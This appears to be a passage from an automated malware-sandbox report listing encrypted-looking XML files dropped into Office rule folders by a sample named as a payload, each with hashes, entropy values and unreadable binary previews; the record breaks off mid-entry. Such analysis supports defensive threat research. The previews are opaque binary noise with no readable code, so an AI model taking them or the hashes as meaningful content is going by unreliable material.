                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11190v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1231
                                                                                                                          Entropy (8bit):7.8098368370652285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:eAnIPZWAhZg1tpG/t8R19pGhCSvushX8WhyzufT0TbD:BkYAhy3Mt8R5+CQ3hsWRfGD
                                                                                                                          MD5:BE620291E8F26AEDFB1088613117D158
                                                                                                                          SHA1:E9F84E5B7A07D253D53790C02CFA1C20E5AE8712
                                                                                                                          SHA-256:6F4A4B2AA770665EC59146F7B89B95A0D14F90AB254AA6EB9FABFDD3D495E0AC
                                                                                                                          SHA-512:1085196FF956B2CF53DD15860CEAE19F22281C46CFA6ACA4E91B905D75F0FC1CFE899E0BC7E199889FF8C37EE259D047755CA5178F15DF8684DEAB678DA16A6C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.B...'..Q.)..o..59...3..#.%9.NlGwml..e.._8..G.......Y}../..[.6....Hj.....,...ZaW.7.TP1.....W..\uH....3$^..a.....H..uA."..,.^\.......u..3...V...E..{R..M;.L..c.....`Y<=.3.].>..M.I.k'...u.^MXG..9..R"&..$i...........1...p.*..,....#;..4C..u....nn.."..2..jl.../...5..}CC..k..q-..N#..U...e.D.y.Q.Y.W..C..\...3_...?.P. ...c0W......5..^&..\y.3....WW.......`...&aT>.`Y:.bg.0Z.....D..$...)o.SBf3".j^.z.....}7..h...-.?.....w.....o......jP."$.yq.dBn.P]....M..Z8.y..`..)..Z..~.*?..kj.?))..!..D.......#.....+._O...=N`.(.J.;...g...j/.k...C@..'.)%.[.G.vF[3oT;.^.dx.y.p..;=.O8.im.....:......,..r5i.,u[.|.....M.FQ..;>.y.{3u.]9.NYg#n...Ws..u...*MT........l.8......O?...I..d.#g..nX...].....dNbP.c".35g..Q&,..l.{.4.....2..Z.;B....G..o..h^..=u...Z..7.4..&?.j....SO..%......]3kiAi......E.-...8!..!.D....N..JT...h}...I.8s./...p.?......7...(.'...D.5..e...VW.....qB....Y-... l.&.....I.......Q...+......1....R.|\m........d...b......4..J.i..k..1....9...O^...4..\.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11195v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7567
                                                                                                                          Entropy (8bit):7.9770237488047115
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:zzpPk4cB22g4+EIPAZ+r6sUnZFyWvZYnrd1tu4X8rgYE7w+fub:z5cEk+HPAgwFnkJ1tL8Kwdb
                                                                                                                          MD5:1E89462100080BB74623346FA41F3709
                                                                                                                          SHA1:0AAFD4CF4D6ED421939557304C6156F9956D7CE1
                                                                                                                          SHA-256:6A7847CA3839C242B335F5C63E7077902C3CF31C004DBABB8D5A5F78AFDC73A2
                                                                                                                          SHA-512:7C617FAA562EA073A70070C38577393855678C73DD6A6ECCC5A62AA00898E2BEA0777C3E0F42699E95585EA8BF885779DC9E3A57BB330837348EA3FA4472D732
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml`..cBx^..V2 ._...4.-...Z#.'....(..m.YYn.......".....B.mB.!...C..y..o.$...qx{mF....4|..B..$.{!..)`j.. "....8..U54.;0.;.*@. ..?,G.Q...Viq5Ii...:L&sb.|k...[.......a.k...a...Y^..bm(.;jCH4..9cf.....K....x.V..h....gZL.f~.n.q...C...}...g.....&+.k..wk.i.7I..0........8....x$.....8.....?|D...I...8..(.C]./..[.%2..nCU..Y....Yv. ...2....9.p|....N..R.r..u.F........3....N OeM].d.7..={7..dE.,...K..CN.D.3...).r.7V./3vo...s.t.Z}.3]0.P.&...x?..S.<?H.S1.Y.G..8S.g.F.?X..1..DCOL..!.6.C.......t.a'.,=A...........JDUG)...>..}h.........5.%j.`.N..9..o......]..v..N..f.|.%.n.....8..g....G..S.f5bSdPp.h...>..Tu.E.6.]].0...u..HZGsg.joC.a.......D.Y...>..u.].eq..d...n.h`..:.F..6...)....{.T..0Y9%.n3..2.%...B......c..-.pE..|0..4.QB.....+....d.^|....ZqH.j........j.]=.E$..}.q.c./.-4..?.`.O$'....M+:v.....sn.."ja..~f#..s..Z.ZT.7XE... ..W!........Q.../8?.=s.z..7.K.....%l_..........#.#..i.).?H....N....|Eh.2q...d.ru...e.9..I.........)..9...<....8S..7o..Z.{.L.\....f.fh.v.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11208v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):816
                                                                                                                          Entropy (8bit):7.729720955261163
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:g3EXsdw4/SS1FcDbE2eK5sXllEso4U4V3arEe1ItKbXMYxRQnoud++WDdgA3ydtt:gEsd2S12kMsvDjZ4E0SON+3+lFiXW0bD
                                                                                                                          MD5:A50760EA1F3C8EF4AC3BD7A50A8142A2
                                                                                                                          SHA1:94E8BD9392E287B15DE436F76D59EEDB164EE444
                                                                                                                          SHA-256:245F2F9A50811713BFB4C54E0805E84646A96143C61149F14F4C52E0858960E5
                                                                                                                          SHA-512:BFDF2BFCDA50FC576ADCD528113611CDB5A77AAFDFB9AE30A9AA343A66C3FECC75D98A761D0A6884FACD1BB955AC2E6DA95E7DD1D1A9694D6A5C49AADEE04749
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.|N..eO. =..{......wZ.2WI..D..W.d..../Fj.;....@..s..+.1....%.Z.....(....mb.=.y.....,.rt.o"Ze.....4.U5.....L8AK.A..h4...R....1R3*bC`.'..U.>....F..w{..o.>...|..j.....>.....f|..G.....6r..+Sm...P.i..Lr.0..^Vq>.5..V.|...B...D...2..t..@g-#U..4W....UPZ.v5....GtS9.R...]U.7..$O.....0F7!].7....n..D.._G.....>.D8.3m...$.N.-.;y.......A....;..5....oz.....Ol.*..>..{.......5....m{..}.~..R.A...a.o..p.D..../.=.V_..P...K...X='.l....Q.=...z...S...A-.........+.M.I..P.4 ......*4..n.k..H..6.....&._.c....qA....../v...^...w"V..|.hZ..oK......v......M....N.G.`7.....@....(%.6....j.V.S .p...F..o..&....k...f..M.r.(.9...My.C!.O...r.O..6....5..a.H.].@..;o-.5uu.a^.)....><.... IuJ.3T..0Z...Yg..7.$......i.Z.a..?./.|.phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11209v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2272
                                                                                                                          Entropy (8bit):7.913176831378123
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:W2daM2aFe+DWWbwm6nmmgYyQa6YvJat+4W+Yzx8jH+sCi8D:4oVDtLEgYyQafgI4Wnx8jH2b
                                                                                                                          MD5:9432D09FC6D902045058B8FBBEA3F67A
                                                                                                                          SHA1:290CC843794EE657AD71B383CE7A464923CCB4BE
                                                                                                                          SHA-256:F013629A17C3E82F3AB7F8760EC478165E4114BAA723C44741339A4F6A6BE5DC
                                                                                                                          SHA-512:B4D4B68BF4F41D9DA719CE5A1FC327F940C3A706885F514EBCC937E6A13BCDA5ADFFB85C39DC66C01F833E11330C1E97B9802175D35E964B86EA2FF1ECFEA2B4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlZ...........1.X+.a.....].ll9.........q.".....E............U<.5...|.9s.=x..r.P..U~.O.3w..<..J.....s.2.J..NU.)XJ{%...{7U..o.{...L$......vNJ5d..t.".........t)..C./&.CcL3.C.....'.)..H...V.#..s.*..U..m2..8G.....h.d........J..l.|m....6(.0.L.8.r.`baWq5&.n...?...pC..S..X.....g.Z..;..i^E..S.....J..O=....&.9..?..........{u..d~c.=L.z..Z_..........+!.>..k .C._..U,.d..c.C......../..6.6.....o#.............j:..Un..6..b......%583...S!....@...R....D....1..<.kZY..+]..^....r..?.u'.X.n.....g6....r..`CR..e[{s=3U...Y.$...kt+ZbC.Q.{`\2.r...to.....l`...oA.....A.I...WMOkjF..j.....o`.P...B..i....9.....W.`:.O..<.C6oR......1.J.1..............X...m....w7....;T(38..x......kE6...x....rP.....u.Y.5.`......m...B;.B..B.........%W.;.0^..4..8(.1Lp/. :.F......'Z....k1..{.A"...o.,D...'.r.y.d2.O.....T.....0R.U=!..}.....z@...5<x.\'..b.6.r8.1.Z..i\...+.~$..Ze.........../XQ.`d.?Q[.r....L^.a..w7)V{8.xZ...."..c@<d....-..l.J.....4......*...............Wo...;....D..C.....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11210v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1311
                                                                                                                          Entropy (8bit):7.850708049320048
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:A4CXMKgc8WovWYtmTB96mL/eek77OknGMxSqvBukb3z6iBydexh3ZbD:A4E5gc9ovoTBkSeJ7lc9WD62YghpD
                                                                                                                          MD5:9F410B1CDBD76D2E03C753EFCE3A99C8
                                                                                                                          SHA1:EA6BDE41B3FD5608DACEC9AE801F2184FF60C1E4
                                                                                                                          SHA-256:C8A5A3DF881FB2605FF55AFD2325D3D12D43556F00464102B8FC846B6DAF50BA
                                                                                                                          SHA-512:B0D246FACC65376AA4BFA4F6CB8389506CF76ED8F886A654E18EC60E7E111C6E0262DFDC20133E2876ACC723788E325537B4594BF10869015228CB4BB32BBE9F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml}u.\..@K.6.;.....*...4.*>.cS....p...^..,.K.....P.........n.@ ;5Y......T)#.X...v(...0.....o.1#t...`{Q.=K....#xP.,...O.I?...d}.._......U.'%|b)..k..F...r.W%.r.......|bDC&.1V...I..5........|...n....H..t..:.7xk.p7S...".....y..w.........0..j...`M.?... =...q(.'.,.v}92.'......:..?.....0...z.xnK...yM`0..PvR.?..wB........O...'5..jx!..aU;Qf&~o........D.....dg....!.N...Gm.aT5G..#.._.)..>...O&.SJaf}.\q. V...<..i_. ^L..:fs.3'....p...\.F...........k..F...G...1..,..\.....[..;'..c....U....ejUC..e..?..r.."..F{...}..fV...12..LGK.+.U....6!.H2.e..bE...8./,_....].m.."\a.M..D.~..ZI..B.F.......g.~...*v1[%H..^S.Lq..q@6.\.%.(..DwU3..^I;v.`...sY.:....(.........{.....-\3....2......&.........rU.}..VM=...B....JL6.....#^.....A..v....!9...'.......,.T..c.....ss.6.Y-MC....k1x....@ .}[3...@dn....q..vVi..;.c.....3.q,(.l...b..(.%...)...2.y.GjK..i..8e.4..L(k?).X...T.p..0.[].t.J...q....$D.B<=[...`}..|[6..Mj..%....U.POc/Y.o.....r...2M7;[N.rC|.. ..(.'.{.@8B...."+..,.{H.K4....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11264v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3172
                                                                                                                          Entropy (8bit):7.942508959590739
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:rOZ3V+7N8RJ5L4WcHncapbcxtp9z4LZGnVoT+E2G2tYwci7WL50pLsD:5K9cHcxDh8GtG2tMi7WL5II
                                                                                                                          MD5:15E8ED4E0B7BD2BEF74B07423D152C3F
                                                                                                                          SHA1:88DEE0E30797B2D2CE5DA121D1B64D1E953D2E3B
                                                                                                                          SHA-256:49980E9DC2189A329BF9765704D78008D09C093D74D06EA45DDC654751F1BB6F
                                                                                                                          SHA-512:99E3C94E6E1EFAB3473F3EF777461F1CFA83098D262160A5975267D65A2E2B10D14586BEC4732EB703AEC1AF4B64FF2FC8906FD662926FE19D20FD70F0084593
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.!.%.&.S..!..W..32...\...x.'D......6...T..9wc.>]...o.I...'..}..,(.4..HkX5....6.`..&.\....B..?...../S.....6&c..a/ .x.W$I{..0...f.;m...RS..c.?..BG.....~0...].v............I...)TNc....\.m...<...J1...A.<.....,ZDQ..&.~o..vF7I$..RE:..?h.Zp../W..k...-.e......;\..z....m......~k.v.a~.JI.`y.E....~u>..lJ..@.z....Pfi...u.k........,.H..R.Td[. .C....%8+Y#.......V......^...6.\w9.t...S"....@......X...0.<8...t..d[F....V.....Z..J...q:........!a.&...5...DYy.[..zYu....Bf.../.y,../K...;..;....@Lz.....K.,.... .d.l@.U....K.7....K..N.U....Z&.O..P.h*?#....P.n3 .!q...t#s...>aWR..wQ[.Z...J...!.@B..e.k.m%..T.v:..T5a.>.(..a.B...r.4..,..!$Y.......f...K....|u}..Y...........O..QK..~5..p....'M*.(..K.Z.UW.P..!^.%..t'.....Y...m....Z.S.......E....1..j9t2........!.%n...u..mE..XLN..z0.....2U.O!.,...D,.V...k.....2...$VDd.).Ws.~_...Me..i..I..c..o...{dV.I.......K.h..Hi.&.....Z.sN...O.@N...9...w.<.?z.Y..+.k.E...zl..........*..KL.N.d...V5..G.kcTI...1....?.,.,...;: ....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11265v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2096
                                                                                                                          Entropy (8bit):7.9007227641891085
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:gMDOy4UYM+zCqw4eI6kq8B3Quea8i56EfHU2vt3D:DQzzpwt6qk3+i56wH/vtz
                                                                                                                          MD5:A1F2BEAA288D90F610E41B825B4ADCC0
                                                                                                                          SHA1:9B8C7510A3FC37198EDF9C057D5C795C1BA2025C
                                                                                                                          SHA-256:B5431348016412C1ABC28DE6631D123207669F6BA156DDF1CE7D12C47F91811E
                                                                                                                          SHA-512:7EA78F211FF196B84DCC56B64684CCAB8125C61C92627832FFE8B36F03EA01BF4D17B35811705085126C7CAF36E0FE866106D3FC3A3B4064677C5A0FDB768074
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.l.Z.-.... v9<.d.wQ?.O.E..G....V....O..R....[.u...S._..I:.-..\.....'.j1`Ve..L.U/.jo.>*L.u...LL..k....#a0..2....he.P]a.w....q..D[.Z..5r.L..8...|..1~.....F.f.q.h.\!A.O+..#.'....\$.\/-..w"St$......u..1.W.T..k1.Z...,..{-.P..nz.;\.=..O%s.C.EYp...vW..S.\<..Yhy"......l.'....c.."...t3.4.M.. ..wy}.}!..\.Y.......^).M.P..Y..z.....o.q1.-<,....Q.I5%V`..,..E"=.j&..M....A .E...D..k....X.*.K]m2%'....0......r<h ){Ke.]..Y...../{-.....Y1......j.. ..:..T..`>.WU.}|.xuj|.....f.......F.)j.....f....os=..M.i.aw6.`8.Ij..&P!Q.h...= ...+.[S&.d.q&....[b...^...0..I#...Rn.h....^).s4 .x<...v..+fi.g.......~n......(.|...m...ey....@./...E...2..U..0..GZ.xO.C.};....c+......o.5.$eU....+a.H*c`..1.....k:.!LQ...A.q..'....n.s..s,.f...+...F.y.k?...$.Y.3Wd2....-^.|..~....h..s.z....3.l\...P_..!>...J.S.GY..jx.Y......h..[.....d.......]R.......f.H..f.....JI_W.....5....Q.,S.x"z....[.6...... ...o.....NI..*+>...1,$...7..H....>MKR...T..u..G......./....:KuO..DJaJp..S.&....j..9..b

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11285v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7525
                                                                                                                          Entropy (8bit):7.974526221281394
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:EZbGEv/NvhDR6VM+Hg3Weuwchp7Y36Ypa3jqQlquiIeg:ExXv0MyeOZRTkuteg
                                                                                                                          MD5:3216FD032CD8D2E085B2F570F5794D46
                                                                                                                          SHA1:0D26488191A75233978B91D08F457AB0E3F201F3
                                                                                                                          SHA-256:C94E84FF677BB0DACECE0417D2E3D0EAD646E482E3DDCBD23C00AD8D40DD7618
                                                                                                                          SHA-512:5C65D0DC6FD9CC09AF563DBAE2FE25637ABAA614FE6D08458FC2D1884328A12EF115F289A348ADF899AC8653F7AEE5AEED973AD8539CD253EDD7198120F6516B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml+5.z.C..;...</......_.^.....y........c.PJ.YYo..9..7..x..|..p..b."....$....8..A.....1..u......(..z.B..........K.F6k~t....v.Z.....Yo...}..{zm.....^..`.)..a.H.m..rM........M%e......qc.X.$.Z'`..bJ!.Ud.QP..HmJ...ZP.......u:..<3m:|.......g..>..Yr?L...H..!3>..O..9.^@..S....h.r.s....].....i...Q..".7..\,r..&.....Ky.3...F.b.Y..o..b#H.0.J.J..z.r...\...".(.4......\>...5t..i....g.....Su.AM......!K...\......B.Yv......{......=...J......*vsU+?H.p..O.0.r..1.....-9...D6z..h|...._.(....BZ.M..@......B.m.IkT...4.....wRH...L..J...xJ.Ie.|..G.......Al..t........+.......g.q<.vb..f......e...r.!... 9.%.K.9..5....(.......m.m....`.1.(+Sj..&.6......1...M...a.]I..6..8V.d.eU....n..hg...)S..Y..@.....7v.5..Yp.....`)....#;Gv|d....PV...|...*..4.0...AB.Y...!.~...*)...c..RR.0.. ..3KUVk..Z?...B..X.J.r.D.....I. .P...+....:.H!)#y...$..*]}.x.2....B.?c.r.....;d (`..eJ...6i}l.n.}4.&...nZN.b.=?..~d.2......LO.\......$..........p.j).|G.......].K.E.D#..^.*....2..n...../

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11289v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4197
                                                                                                                          Entropy (8bit):7.954178639853342
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:7+r1TBSrPeXTkB6FzapFEO5v3uLNPDWXMHdkAa0Uo0fYi3:7eBSrawkSuOp3uLNNbXsfV
                                                                                                                          MD5:CF7CDE8BCCE63162A23304234210CF27
                                                                                                                          SHA1:CFD15C46DDDAD2F6B23FBAB62128C74F2CDE90E6
                                                                                                                          SHA-256:0BBC1699ABC23F86F7919AA7DD55FF89A72AD3DD07FD4CD6CFB46C4223D5D550
                                                                                                                          SHA-512:8287B08948B9C087AAA8F75E9B86E8DC81E5CBB931CACA4427875CC9EC0F4833B591225FA41E8E15A6652DFAEAE95C0FF802966522E27E1A997FE943789EA0F9
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.P.U.{..'/.T.HX..gC@.o...k.......jKl.r..Z?..5jeL.5".....+jsi|.(.....c...)J!5.}.K.....S.c...(.[....v=..I..>_..y.0...Iw...,...8......G<T2@...6........ S..]..3.c ..I3...B..@.8.k.f.(..p...$dL.e....8n8..D|...o...B.).A..9...H/d6d..!.U.~lKhb...o..Z.A.O....k.S.k%]..X.i.SB.y..LI4...\$....n.C/.p..M.:.^...R.0!t`4..\...U..6.Q.k...z._o.e.g..7f&........r..G)Xf...~?J..i.T#...R....g......m=..l.].y....Wr.w...X.T..6t..0./7....?.F...........E.....A..d.z.$L._..).-..z3..X.#.<Cr/a....-^..C..w.|.t>..Y.+.M....j.K.....1,.9&.8.K-R....{..*..c.B..P......l...X9./0.8.a.Q..H...l.....#.pB...l..0.s...v..\..[t...P..."....w._~.X.WOnJM"!E.../1^M...uNg.V.p^.!.~..".....)....e.=...:.S!*.o..p1}^.eG...w...P......lw.Z:x.....MPc....(.G....4..^.o4.....7$.....UW!.[..[.<.w.[..n...d.....V.*.P.n.....b.r.......\u..Iz".`.1R....B...$z...B._1HQ.Knb...7\.z.H.S.-..*.........L..~J......UpCS...~. ...u.L.A^~5Bk..N..].|{......yj..b..9B2.>.$..&......f.b{....S.<....`U...A...b.[....F.z.R(..$...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11300v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4608
                                                                                                                          Entropy (8bit):7.9564809640206695
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:lDwr4O3qdLDajBe/lkItgwAGoQmZaqacAvyTCQbemR9824:l8kFdLDdlNtg4gaPcNbn+
                                                                                                                          MD5:DAB16570AA274179755679D3D36AFEDF
                                                                                                                          SHA1:1EE451B7D08CE2B931249285326C1AE78B0772A2
                                                                                                                          SHA-256:4C1E7D9E579469BAE5A074F671F1CA9F4BE86CFF72F09284AE410C0F6C628E18
                                                                                                                          SHA-512:A58814C0CBD288314F016C2550B6D01F2A1B2DE57231326DC314E36B9833D3892B82A6B55493AA42CD32625E5E19FB4A9B368E015396872DF86F62D32B574226
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml> ...pF...2&H.....f))........>M.5....O...V..x..c6v...nE.."..9.\5..D..)k.s.h. .3Y?A..!gE...Gh9..8.....N...WJ.@d5..=.fK.72..N...;N.......W..e.j.#B./.atgq[.c.q..X....!.N..pH.:.>I2N."....Rc........nx....s..`.w...bL)..u..y`;).. .s.Z.-..S.OY..s.H.8....!c.DkH.....m.8.....H.?*t......qRt.&\o..!|.F.1.mq.*....m. F...m......*.....,...i..a..-...Y=..C}..]z])....Y..Y....pv.I..E.....Q...8.>.o..?.f.^...5..d@..O..1.C.8%T(....._;..b..yN..zE.n..<.Q...]...V7sFl.0...^4.&....&g....r...J......8.......*.SF.....8..6U d...c.?./.@...l..^.T..Hfp(..T...@B..v...@.zb.....C.Dg.Bi..x.7.Z-Z.HY8.[L}*....$.V=.&.4{.r.M..{..........T=FH..I ..r...3....o.m>.......\..2X=:.*..|=I.G...i...,...>[..g4/.r.t7.......VK!d.#..=.<0.v.^.....%7.....w2#..g.u.r.3XX..H.....Q......B..l.~.$3_.e p..ZL.E.....n...........Y.&.~(.O....Q.F..R.s@..b.u...."..+.d...`...h.....G.e=.T:.o...|.[......~....W....Yg.:.5.G..b3.n.R..$.@.s..C...x^..Q.y..ro.2%...VD...b,n...NCi..|...{...8..M..I(.scK

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11302v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2884
                                                                                                                          Entropy (8bit):7.923472172058011
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:SxPmXWuG5Rv0pvoUi3M++0rFl0iKCI1xuCOIHev8b/MpyUHCqhy88tnSmRbjqD:KmZRJC3M4PDCpIIiyUHCqhH8tSani
                                                                                                                          MD5:C8ACDD7927DF076DEC66586785C36A13
                                                                                                                          SHA1:6288EA985D26E248C78C9B5C8CB46ADF571F3879
                                                                                                                          SHA-256:A6CC1DD4BC16C616B564745492439AB1D9913C53A2477D05D7DF6DE215BB165C
                                                                                                                          SHA-512:6DDF3BE818160A9D24ED4726672E0302B60455B0F184C01B658A57207BD06DC8BA9015E2A1B53285816366FFBE2FADA5B8A6BD126F5E8E6CA6717ABAA067AA9B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml1.\.././..ANa)Q...A....|3.;.R...2`X...y.....<..m..-.......j.@...E+.....i.f.'V.......1`.z...|v?..O....r.....Y..um.wFK........._...?}....aMq..T.{.,..d.2.p.;.!..<.....D.[.tT...mxFi....au..=.y..+.;J.F.M...=..B;.;.iJ..-K0Q}Jl.....s.R.Z...Q.O.....F$8.+.$M.v'<Y.R9.a).r$.CPi..C;.....%g..t.\;.^..co.jQ0.H...Z.q).....EO.H.....G.a...V.;....Q.sy.72....i.....[.m.B...n.z.g.E.X..K.'.t......EN.. a..>h.....n.......O.. .......\.rvq....V#.K9..ud.|..,".y........J...|.ef.5..uJ.?z7..ed.....R.....pq....[b....[..K6:v.J$J.E./C.$.D.WO.4..).. ..q....K.<..Q1OEf.e.D.y.48....U..s/....Jy..o..r..Op\.....)...q....#....s.Pm..:..?y.X....;(..B.M..W.o.T2.9.Xq...y.........VgMr....3.o..`.J...6..Y.....D.jv..xk..7..2.....p5m.....[.9..+....;..@..n...<.......*....<F..W....[..].)....Z.:e{.`.]o..D....I.\.......U.1.N.`...."..T..........T..:p.{AE~I`^...B......#];.3..[.hg.LQq..[..........^.X=...&.......E....I.:......)5.";.+mq|0..\u.#.5.Y...;.......u....+..o...o5.nM...v.....!M

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11362v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):5842
                                                                                                                          Entropy (8bit):7.9650069488531505
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:fep4W4E4+C3YjySvFCV0Bqp7CYh0MhrEqNjl+oKwL1/nz1lPjxC:G6j+YYB9CVY8mKrLlJKwFnzPLg
                                                                                                                          MD5:1F1B4E8BE87197766340D74447316921
                                                                                                                          SHA1:9CA98A088BFF555F7833D545DC4E56BAE2DE75AB
                                                                                                                          SHA-256:27467F66FBAF9B09E05885EEE3EBA021298738EFD34B71F72B9185BA5863400B
                                                                                                                          SHA-512:E18DE122E6F2FD2BC73196DA7F808EEC5EFFAB8ED62422B51D406CA20E1BDC476239F4CBAFAD03D8BF963ECD80B18E6915E0EAED73B88745DBBEE80C23170776
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.fJ.LK.R.s....}...<.....M..o|G....`.\...L...ay,F.5c.).w.!...:...9..._/..Fc....=...}.F:Fa._._.F....XSqba...|...A;..D..Z.Y..T.ZN.*..U7.Y.h..VM!....kh.E.}...HI.".8..4>x..G.....<9x.>E.,.F5..>.B.?V..P....k_....<.....ue.%..U.a-.....Dp..F...6..|4M.b....i9..R~,D.V.....$.8.....*.7......-B.".@.9......H..$.9..t..v..k...JV..G....#..t......Ks..^.].){NGZ6y.A...q...j.A..TT2~.P0f=#..kX.|R....[.ca..u.g>..m...?..y..hAx.$....W/W..#G..R.........j$.P.!)7.aJ.j.D.#'..'v[......... ..JU...v..{.ecJ..YA..\.Tf x..U..n.!.....D......\....[....!N..BR..>.W.....[$.s...x.A7.....dT.}.zv../M....S........r..KH.%.#D....!..V.m@.8..._&"...T....v...m/l..c...]...R.@......Y....(YV....5.....2.b..DWNt...5...c...._;.Rv.x...Qr.>./../...........o..'...^......h..C..n}.y..d....v-.AV.E.g?..u.x..#..w&...s..~^......tv....0.f...R-.;+..8s...{...zO.f.y......%x...-F...o#L.w.+.............k...u.#.].oR......}8q...1dswK..\. .{...'..X8J.;.C..4g........GLH...3.G*.p.....7gF........{A.;i..........

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11369v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2023
                                                                                                                          Entropy (8bit):7.909580370874749
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:AgP6qBotZ0+AOT4sRZe4W9+9DNj+iWUO08IinUc1Y7VRP3qedECCD:AkLWRAdce4W9cpRDOJlX1YzqedEn
                                                                                                                          MD5:1132406F1D6147342E25BF10E45EB756
                                                                                                                          SHA1:29848A9E395FDD52A1152CF6A0E22EB199A6B57E
